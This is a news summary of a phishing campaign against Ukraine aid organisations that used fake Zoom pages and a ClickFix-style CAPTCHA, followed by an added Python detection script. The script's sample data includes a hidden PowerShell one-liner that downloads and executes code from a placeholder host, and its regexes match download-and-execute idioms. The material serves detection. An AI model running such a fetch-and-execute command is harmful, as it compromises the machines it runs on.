Ukraine Aid Groups Targeted Through Fake Zoom Meetings and Weaponized PDF Files
Briefly

"The phishing emails have been found to impersonate the Ukrainian President's Office, carrying a booby-trapped PDF document that contains an embedded link, which, when clicked, redirects victims to a fake Zoom site ("zoomconference[.]app") and tricks them into running a malicious PowerShell command via a ClickFix-style fake Cloudflare CAPTCHA page under the guise of a browser check."
"The bogus Cloudflare page acts as an intermediary by setting up a WebSocket connection with an attacker-controlled server, and transmits a JavaScript-generated clientId, with the browser taking the victim to a legitimate, password-protected Zoom meeting if the WebSocket server responds with a matching identifier. It's suspected that this infection path is likely reserved for live social engineering calls with victims, although SentinelOne said it did not observe the threat actors activating this line of attack during its investigation."
A coordinated spear-phishing campaign named PhantomCaptcha targeted organizations associated with Ukraine war relief and multiple regional Ukrainian administrations on October 8, 2025. Phishing emails impersonated the Ukrainian President's Office and delivered a booby-trapped PDF containing an embedded link that redirected recipients to a fake Zoom site (zoomconference[.]app). The fake site presented a ClickFix-style Cloudflare CAPTCHA that coaxed victims into pasting and running a malicious PowerShell command via the Windows Run dialog. The command launched an obfuscated downloader that retrieved a second-stage payload for host reconnaissance and exfiltration to the attacker-controlled server. The infection vector appears tailored for live social engineering calls.
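A command pasted into the Windows Run dialog starts as a child of explorer.exe, which gives defenders a process-lineage signal for the ClickFix step described above. The following is an added detection example, not code from the report or its authors; the Sysmon-style field names, the trait regexes, the threshold and every sample event are assumptions constructed for illustration.

```python
import re

# Shells a ClickFix lure asks the victim to start from the Run dialog.
SHELLS = {"powershell.exe", "pwsh.exe"}
# Heuristic command-line traits (assumptions of this example, not IoCs from the report).
TRAITS = {
    "hidden_window": re.compile(r"-w(in(dowstyle)?)?\s+(h(idden)?|1)\b", re.I),
    "encoded_command": re.compile(r"\s-e(nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "web_download": re.compile(r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|net\.webclient)\b", re.I),
    "dynamic_eval": re.compile(r"\b(iex|invoke-expression)\b", re.I),
}

# Constructed process-creation events (hosts, paths and URLs are placeholders).
SAMPLE_EVENTS = [
    {"Host": "WS-01", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell -w hidden -c "iex (irm https://placeholder.invalid/check)"'},
    {"Host": "WS-02", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe"},
    {"Host": "WS-03", "ParentImage": r"C:\Program Files\MgmtAgent\agent.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -EncodedCommand QQBBAEEAQQBBAEEAQQBBAEEAQQA="},
    {"Host": "WS-04", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "CommandLine": r"pwsh.exe -NoProfile -File C:\Scripts\backup.ps1"},
]

def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def score_event(event):
    """Return matched trait names for a shell launched directly by explorer.exe."""
    if basename(event["ParentImage"]) != "explorer.exe":
        return []  # not started interactively from the desktop shell
    if basename(event["Image"]) not in SHELLS:
        return []
    return sorted(n for n, rx in TRAITS.items() if rx.search(event["CommandLine"]))

def detect(events, threshold=2):
    """Flag events that carry at least `threshold` suspicious traits."""
    scored = ((ev["Host"], score_event(ev)) for ev in events)
    return [(host, hits) for host, hits in scored if len(hits) >= threshold]

if __name__ == "__main__":
    for host, hits in detect(SAMPLE_EVENTS):
        print(f"ALERT {host}: explorer.exe -> PowerShell with {', '.join(hits)}")
```

Requiring two traits keeps a user who simply opens PowerShell or runs a local script from the Run dialog out of the alert queue.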
Read at The Hacker News